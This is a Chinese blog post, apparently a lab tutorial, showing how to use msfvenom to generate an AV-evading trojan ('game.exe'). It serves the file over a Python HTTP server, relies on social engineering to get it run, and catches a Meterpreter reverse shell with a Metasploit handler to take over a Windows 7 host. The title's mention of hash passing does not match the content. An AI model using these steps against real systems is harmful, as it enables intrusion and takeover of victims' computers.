经典攻击示范--离线攻击--HASH值传递

已于 2023-07-09 10:58:10 修改
阅读量105 收藏
点赞数
分类专栏: Kali+Python 文章标签: Linux 网络安全 python linux 安全
于 2023-07-03 09:54:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61427044/article/details/131509959
版权

经典攻击示范–离线攻击–HASH值传递

image-20230702002741929

Msfvenom

Msfvenom 是净荷生成和编码的组合,它在2015年6月8日取代了MsfPayloadMsfEncode这两个工具。

The advantages of msfvenom are(优点):

  • One single tool (一个单一的集成工具)
  • Standardized command line options (命令行选项标准化)
  • Increased speed (优化速度)

Msfvenom 查看Payload

查看msf支持的payload列表:

#msfvenom -l payloads

image-20230702005725096

Msfvenom查看输出格式

查看msf支持的payload输出格式:

#msfvenom -help-formats

image-20230702005942496

*即使我们不知道目标系统存在哪些漏洞,如果我们能够将攻击载荷放在目标系统中,也是能够获取目标系统的权限的。

Msfvenom编码

查看msf支持的编码器:

#msfvenom -l encoders

image-20230702010306566

*选择不同的编码方式用于逃避AV的检查。

Msfvenom生成game.exe

image-20230702010415728

image-20230702010906013

传输木马到Windows 7:

*在这里使用简单的方法,Kali启用HTTP服务器,Windows 7通过网页访问Kali下载木马文件。

python -m SimpleHTTPServer 808

image-20230702011548181

*在哪个目录下启用HTTP服务,该目录就为分享文件的根目录。

传输木马到Windows 7(此处需要社会工程学)

image-20230702012251368

Msfvenom

开始监听连入的目标流量:
	>use exploit/multi/handler
	>set payload windows/meterpreter/reverse_tcp
	>set lhost 202.100.1.220
	>set lport 4444
	>exploit

image-20230702012640004

在这里插入图片描述

在目标主机上运行木马程序

在这里插入图片描述

msf已经监听并建立到目标系统的连接

image-20230702014153386

成功获取目标主机的系统权限

image-20230702014236674

辉小鱼~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali密码攻击之——离线攻击工具
TK_Share的博客
06-12 1669
在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决 Creddump套件 kali下离线攻击工具中的Cache-dump,lsadump,pwdump,均为creddump套件,的一部分 Chntpw 用来修改Windows SAM文件实现系统密码修改,亦可在kali作为启动盘时做删除密码的用途 这里有一个该工具使用的链接http://blog.csdn.net/pyufftj/article/details/20387189 Crunch 实用的密码字典生
imporve-3
loveX001的博客
02-26 580
JSX的本质是React.createElement()函数的写法如下 实际开发中不会使用来创建的,一般都是使用JSX的形式开发。在程序中打印一下 为什么 React 使用 JSXBabel 插件如何实现 JSX 到 JS 的编译? 在 React 面试中,这个问题很容易被追问,也经常被要求手写。它的实现原理是这样的。Babel 读取代码并解析,生成 AST,再将 AST 传入插件层进行转换,在转换时就可以将 JSX 的结构转换为 的函数。如下代码所示: React.createElement源码分析 入
MSF 离线攻击
weixin_30656145的博客
08-03 347
MSF 离线攻击 MSF连环攻击在internet上实现是不太现实的,网络中的安全设备(防火墙、入侵检测、入侵防护系统)。 实验拓扑如下: 实验说明:安全实验中的包过滤防火墙在测试中使用的是linux iptables,上述拓扑中,攻击者的公网地址为61.67.1.100/24,而防火墙上的公网地址61.67.1.200/24 对内部主机192.168.1.0/24 做SNAT。...
网络攻防实验:离线攻击工具——彩虹表破解
啵啵卜卜贝
09-30 6283
一、实验目的 (1)学习BackTrack5(已经合并到Kali linux中)的功能和基本使用方法。BackTrack5是网络安全领域非常著名的黑客攻击平台,是一个封装好的Linux操作系统,内置了大量的网络安全检测工具及黑客破解软件等。 (2)掌握RainbowCrack的使用方法(此次实验使用kali linux)。 (3)使用彩虹表破解散列值。 二、实验内容、步骤、结果 如操作环境、系统配置、操作步骤、程序源代码、测试数据、测试结果、截屏等。 (1)操作环境:Kali linux (2)系统配置:K
Kali密码攻击离线攻击工具(一)
miao_9的博客
04-09 2988
Kali密码攻击离线攻击工具(一)在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决。1 Creddump套件Kali Linux离线攻击工具中的Cache-dump、lsadump与pwdump均为creddump套件的一部分,基于python的哈希抓取工具,项目地址:http://code.google.com/p/creddump/source
经典示范攻击 - 指定攻击
辉小鱼的博客
07-03 50
*,它让被攻击主机主动与Kali建立TCP会话,让我们能够做很多有趣的事情。查看需要配置的选项(Required是必须要配置的选项)成功渗透,并且将meterpreter上传到目标机器上。使用Nessus扫描目标主机Windows 2003。经Nessus扫描,我们可以利用目标主机上的 **首先进入msfconsole,然后查找**,所以实际上这里并不需要设置。找到适当的操作系统并且下载。第一次登陆,并且初始化账号。申请Nessus激活码。查看可以使用的攻击载荷。Nessus官方网站。
_improve-3
loveX001的博客
02-26 843
第一个参数是必填,传入的是似HTML标签名称,eg: ul, li 第二个参数是选填,表示的是属性,eg: className 第三个参数是选填, 子节点,eg: 要显示的文本内容 ----------@--------------------@----------事务 (Transaction)异步与同步: setState并不是单纯的异步或同步,这其实与调用时的环境相关:注意事项:总结 这是一道经常会出现的 React setState 笔试题:下面的代码输出什么呢? 我们可以进行如下的分
软考A计划-电子商务设计师-电商设计师重点
空名先生
06-05 2042
有什么需要欢迎文章底部卡片私我,获取更多支持,交流让学习不再孤单
Git 教程 - Git 基本用法
u011679955的博客
03-25 4861
目录(?)[+] Git 教程 - Git 基本用法 您的评价:          收藏该经验 Git 是当前最流行的版本控制程序之一,文本包含了 Git 的一些基本用法 创建 git 仓库 初始化 git 仓库  mkdir project  # 创建项目目录  cd project  # 进入到项目目录  git init
MD5-Hash哈希值计算工具
09-07
一个完全免费而且体积小巧的哈希值计算程序,支持字符串和文件的哈希值计算。 目前可以计算的哈希值类型包括:MD5、SHA1、CRC32,支持拖放,大家在使用的时候只需把你需要计算哈希值的文件拖放到程序窗口中即可。
vue-cli3中配置alias和打包加hash值操作
10-14
本文将深入探讨如何在 Vue CLI 3 中配置 `alias` 和添加 `hash` 值到打包文件名。 首先,我们来关注 `alias` 的配置。在开发大型应用时,我们常常需要引入大量的模块和文件,这时相对路径可能会变得非常冗长。`...
comparaison.rar_hash_min-hash
07-13
MIN-HASH 算法实现小程序,建立M文件,就可以运行
hash-wasm-benchmark:Hash-wasm 基准测试应用
08-04
hash-wasm 基准测试
hashcat-6.1.1
12-29
hashcat-6.1.1 hashcat-6.1.1 hashcat-6.1.1hashcat-6.1.1hashcat-6.1.1hashcat-6.1.1
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8295
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Ubuntu 18.04 安装 PCL 1.14.1
最新发布
u014374826的博客
06-21 438
Ubuntu 18.04 安装 PCL 1.14.1
2024 年最新基于 LLOneBot NT 框架搭建 QQ 机器人详细教程(更新中)
唤醒手腕的博客
06-14 761
llonebot(LLOneBot)是一个与OneBot(也称为CQHTTP)协议兼容的机器人框架,它允许开发者使用不同的编程语言(如Python、Go、JavaScript等)编写机器人应用,并与各种支持 OneBot 协议的聊天平台(如QQ、Telegram、Discord等)进行交互。onebot 11 背景。
基于自编码器的心电图信号异常检测(Python
weixin_39402231的博客
06-17 489
使用的数据集来自PTB心电图数据库,包括14552个心电图记录,包括两类:正常心跳和异常心跳,采样频率为125Hz。
节点的hash值是MOVED(-1)
06-10
MOVED(-1)的值表示需要重新定向到新的节点。Redis集群通过对键进行哈希计算,将键映射到槽位上,每个槽位对应一个Redis节点。当一个节点接收到一个不属于自己槽位的请求时,它会返回MOVED(-1)的错误响应,告诉客户端...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值